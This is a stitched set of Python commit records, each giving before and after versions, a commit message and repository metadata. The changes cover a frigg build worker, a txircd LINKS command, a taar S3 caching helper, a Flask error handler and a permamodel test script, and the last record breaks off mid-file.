from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
for result in build.results:
del result
del build
|
<commit_before># -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
del build
<commit_msg>Add deletion of result after build<commit_after># -*- coding: utf8 -*-
import json
import threading
import time
import logging
from frigg.worker import config
from frigg.worker.jobs import Build
logger = logging.getLogger(__name__)
def fetcher():
redis = config.redis_client()
while redis:
task = redis.rpop('frigg:queue')
if task:
__start_task(task)
time.sleep(2)
def __start_task(json_string):
task = json.loads(json_string)
thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
thread.daemon = True
thread.start()
logger.info('Started %s' % task)
return thread
def __start_build(task):
build = Build(task['id'], task)
build.run_tests()
for result in build.results:
del result
del build
|
cce8c4b40038a8b8ddccc76f7d13c7f5d0e5e566
|
txircd/modules/rfc/cmd_links.py
|
txircd/modules/rfc/cmd_links.py
|
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()
|
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()
|
Make the order of LINKS output consistent
|
Make the order of LINKS output consistent
|
Python
|
bsd-3-clause
|
ElementalAlchemist/txircd,Heufneutje/txircd
|
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()Make the order of LINKS output consistent
|
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()
|
<commit_before>from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()<commit_msg>Make the order of LINKS output consistent<commit_after>
|
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()
|
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()Make the order of LINKS output consistentfrom twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()
|
<commit_before>from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()<commit_msg>Make the order of LINKS output consistent<commit_after>from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements
class LinksCommand(ModuleData, Command):
implements(IPlugin, IModuleData, ICommand)
name = "LinksCommand"
core = True
def userCommands(self):
return [ ("LINKS", 1, self) ]
def parseParams(self, user, params, prefix, tags):
return {}
def execute(self, user, data):
user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
for server in self.ircd.servers.itervalues():
hopCount = 1
nextServer = server.nextClosest
while nextServer != self.ircd.serverID:
nextServer = self.ircd.servers[nextServer].nextClosest
hopCount += 1
if server.nextClosest == self.ircd.serverID:
nextClosestName = self.ircd.name
else:
nextClosestName = self.ircd.servers[server.nextClosest].name
user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
return True
linksCmd = LinksCommand()
|
f0e11b0743c2779f61970917da6eef859149f600
|
taar/recommenders/utils.py
|
taar/recommenders/utils.py
|
import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
|
import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
|
Make sure to load the S3 cache file when available
|
Make sure to load the S3 cache file when available
|
Python
|
mpl-2.0
|
maurodoglio/taar
|
import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
Make sure to load the S3 cache file when available
|
import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
|
<commit_before>import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
<commit_msg>Make sure to load the S3 cache file when available<commit_after>
|
import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
|
import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
Make sure to load the S3 cache file when availableimport json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
|
<commit_before>import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
<commit_msg>Make sure to load the S3 cache file when available<commit_after>import json
import os
from tempfile import gettempdir
import boto3
from botocore.exceptions import ClientError
import requests
def fetch_json(uri):
""" Perform an HTTP GET on the given uri, return the results as json.
Args:
uri: the string URI to fetch.
Returns:
A JSON object with the response or None if the status code of the
response is an error code.
"""
r = requests.get(uri)
if r.status_code != requests.codes.ok:
return None
return r.json()
def get_s3_json_content(s3_bucket, s3_key):
"""Download and parse a json file stored on AWS S3.
The file is downloaded and then cached for future use.
"""
local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
local_path = os.path.join(gettempdir(), local_filename)
if not os.path.exists(local_path):
with open(local_path, 'wb') as data:
try:
s3 = boto3.client('s3')
s3.download_fileobj(s3_bucket, s3_key, data)
except ClientError:
return None
with open(local_path, 'r') as data:
return json.loads(data.read())
|
60c62cea5d0775ce443280c0973ce323d26eaa28
|
app/main/errors.py
|
app/main/errors.py
|
# coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
# coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
Change app-level error handler to use api_client.error exceptions
|
Change app-level error handler to use api_client.error exceptions
|
Python
|
mit
|
AusDTO/dto-digitalmarketplace-buyer-frontend,AusDTO/dto-digitalmarketplace-buyer-frontend,AusDTO/dto-digitalmarketplace-buyer-frontend,AusDTO/dto-digitalmarketplace-buyer-frontend
|
# coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
Change app-level error handler to use api_client.error exceptions
|
# coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
<commit_before># coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
<commit_msg>Change app-level error handler to use api_client.error exceptions<commit_after>
|
# coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
# coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
Change app-level error handler to use api_client.error exceptions# coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
<commit_before># coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
<commit_msg>Change app-level error handler to use api_client.error exceptions<commit_after># coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
0b2cf0a651d27af90a229d85f77ac9ebd2502905
|
run_test_BMI_ku_model.py
|
run_test_BMI_ku_model.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
Use BMI method to get ALT value
|
Use BMI method to get ALT value
It looks like it may not give the correct answer, though.
|
Python
|
mit
|
permamodel/permamodel,permamodel/permamodel
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
Use BMI method to get ALT value
It looks like it may not give the correct answer, though.
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
<commit_before>#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
<commit_msg>Use BMI method to get ALT value
It looks like it may not give the correct answer, though.<commit_after>
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
